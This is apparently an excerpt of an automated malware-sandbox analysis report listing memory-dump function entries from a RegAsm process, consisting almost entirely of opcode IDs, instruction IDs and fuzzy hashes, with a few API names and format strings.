                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a24f7f661d75d1a09e4b118bfdd93b09900cf3cdf46c10c851b4fc472e299963
                                                              • Instruction ID: 2f864cc13a84718226359689234aad11a461abaeba2a7d4eb4c3c6608187b2f5
                                                              • Opcode Fuzzy Hash: a24f7f661d75d1a09e4b118bfdd93b09900cf3cdf46c10c851b4fc472e299963
                                                              • Instruction Fuzzy Hash: F0017171A1020DEBDB00DFA9D84199EB7F9EF48344F10405AF900E7390D6749A008BA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09ec83d6e33cf0ee30cb040e69e1c9b5577e6e8eb2e8bdb2fa1611f6c7e879e3
                                                              • Instruction ID: d84080069915fdf4dc6c99a7f28c28cd51ebb1c15c87078ecd5ba0080d65a281
                                                              • Opcode Fuzzy Hash: 09ec83d6e33cf0ee30cb040e69e1c9b5577e6e8eb2e8bdb2fa1611f6c7e879e3
                                                              • Instruction Fuzzy Hash: C7017171A0020DEBDB04DFA9D8419AEB7F9EF48344F10405AF900E7391D678A9008BA1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44ee0808a39584c63f58682fc1a438bb209ea2d814e4b0a7ed6c9b1d7a6e40ae
                                                              • Instruction ID: 932f56ec8b56db89f342d3ecd15bbb1be2f6ed149e228849780e34be305f69c6
                                                              • Opcode Fuzzy Hash: 44ee0808a39584c63f58682fc1a438bb209ea2d814e4b0a7ed6c9b1d7a6e40ae
                                                              • Instruction Fuzzy Hash: 47017171A0020DEBDB00DFA9D85199EB7F8EF48344F50405AF600E7390D67499008BA4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: 43003f6226b41ddc16b4da75c5de513e0ad626cb138f90622de6b8abca428e88
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: AEF0FC33644A329BC73256594D40B6FB5968FC7BE4F1B0437E3099B244CA648C0997D4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: ba5c280e4b9486ad9dacc7daae2f8aa94bcb2a666b96fb4b4b47d714a2cca2f4
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: DAF0C2B2A00620ABD324DF4DDC40E57FBEADFC0B80F048129AA05C7220EA71DD04CB90
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: 771dc2d3cb86a3e8bcd8ba6d92cb6c9f85a4af18510c31c548ad860d53edd3a5
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: 74F0F97220001DBFEF029F95DD80DAF7BAEEF497D8B104165BB11A2160D631DE21ABA0
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4257af23d2178c68a4e6dbf31cb43bc777037789dae41f00b92c16c9aa452f2
                                                              • Instruction ID: 055d2c6e642354e2e9cb3e8fe86b923c39506f51502412235cca39cf6495d73e
                                                              • Opcode Fuzzy Hash: b4257af23d2178c68a4e6dbf31cb43bc777037789dae41f00b92c16c9aa452f2
                                                              • Instruction Fuzzy Hash: 30018F71A0125CEBDB00DFA9D841AEEBBF8EF48350F14005AF501A7380DB78EA01CBA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e25c8e1869a2478923089f6afa8282aaba0094edfa3098a707fbc7a2ca4af76b
                                                              • Instruction ID: ab9c2c0af4b8d5a23870a3a3764c9603df4c4587cf8d4efb34d6216ffa2f543e
                                                              • Opcode Fuzzy Hash: e25c8e1869a2478923089f6afa8282aaba0094edfa3098a707fbc7a2ca4af76b
                                                              • Instruction Fuzzy Hash: 64018536501209ABCF12AE85DC40EDA7B66FF4C7A4F068101FE1866224C336DA70EF81
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6534ad2de02a443ee7f919abe2d639843ad3ab5c0fdf626590cb5cbd7321d881
                                                              • Instruction ID: 5ab6bc9236be4d27215f5f96709da315f1062e782c22cc0e58dd179052f7a52f
                                                              • Opcode Fuzzy Hash: 6534ad2de02a443ee7f919abe2d639843ad3ab5c0fdf626590cb5cbd7321d881
                                                              • Instruction Fuzzy Hash: D2F024727042305BF310A6199C42B7B729AEBE17D0F26806BEB058B3C0EB70EC05C394
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c16521511c12a7fce015549871309bb215e226393decd9601867f02a77d59d56
                                                              • Instruction ID: 9bf059ad75591d777928ae2f1e2b0008f130d04ecb0d633178fe05c59b4d80b1
                                                              • Opcode Fuzzy Hash: c16521511c12a7fce015549871309bb215e226393decd9601867f02a77d59d56
                                                              • Instruction Fuzzy Hash: 3701A4B17017849BE3329728CD5DB3537A9EB40BC4F580194BB02CBBD6DBACD801C614
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: c4b5734c505c8b16a870943139bebb946232dc3a0a5fc6231c526c90ad446109
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: 79F0E932B41A1247DB35EA6DE820B2EB297AF90AC4B0D052C9701CB640DF70D801DB90
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd9469940ac6de186f2548fa8d97b53c1c42922693ff78c9ea193757529ee761
                                                              • Instruction ID: 443eeb9064b8d7ff3155e02879a7c1f078f9683aeed8e404b1150567ad9dade2
                                                              • Opcode Fuzzy Hash: dd9469940ac6de186f2548fa8d97b53c1c42922693ff78c9ea193757529ee761
                                                              • Instruction Fuzzy Hash: 59F0BE3AE127E09FD733CB68C444F62B7D49B00BE4F0C89AAD79987541C764D881CA50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d8e25af952ea199982e648cfa84ef6b049cc5f67f7145e692718f528a1f0852
                                                              • Instruction ID: 7af24b966b26ee578dba91fceff5a76371ab7554a7d0b4936dfc5bdf8f2bfb94
                                                              • Opcode Fuzzy Hash: 6d8e25af952ea199982e648cfa84ef6b049cc5f67f7145e692718f528a1f0852
                                                              • Instruction Fuzzy Hash: 9BF0273A8176C806DF726B28B8903917F5D9B52294F29108DCBA25721BCEB98483CB20
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: 0f589e4bc605f6bc617dbff6345416ff7ce9098bef23ad175d5985dd3ea24616
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: A5E0D8723006002BD711AE59CCC0F477B6FEFC2B50F04007BBA045F251CAE2DC098AA4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82779fcdd2a156b7b017a8c5da43d7df8cfc5ba747a43022fb15ca7f6c2d27ab
                                                              • Instruction ID: abc73a34882ff6daa6f72157c49e73134bf64bd1a6cb9eab87f2b430638e0f81
                                                              • Opcode Fuzzy Hash: 82779fcdd2a156b7b017a8c5da43d7df8cfc5ba747a43022fb15ca7f6c2d27ab
                                                              • Instruction Fuzzy Hash: 63F0E272A116909FD322D718C64CB7277D8DB40BE8F08A567D6CEC7952C765C880CE58
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: 2b9dc809d8ca3d7079cc7f8ff75a59436cc4d47e00fafb7ff7c085b198765e54
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: BCF030726482049FE3209F45DA84F52B7EDEB457B4F55C029E709EB560D37AEC40CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: 74a99b0af35cdf0876121ab5f8982f4c4511732fcf88eae78ed2a7d08d6c7211
                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction Fuzzy Hash: 15F0ED3A7043489BDB17DF15C040AA9BBE9EB413E0B0000DAFA428B341EB31E982CF80
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472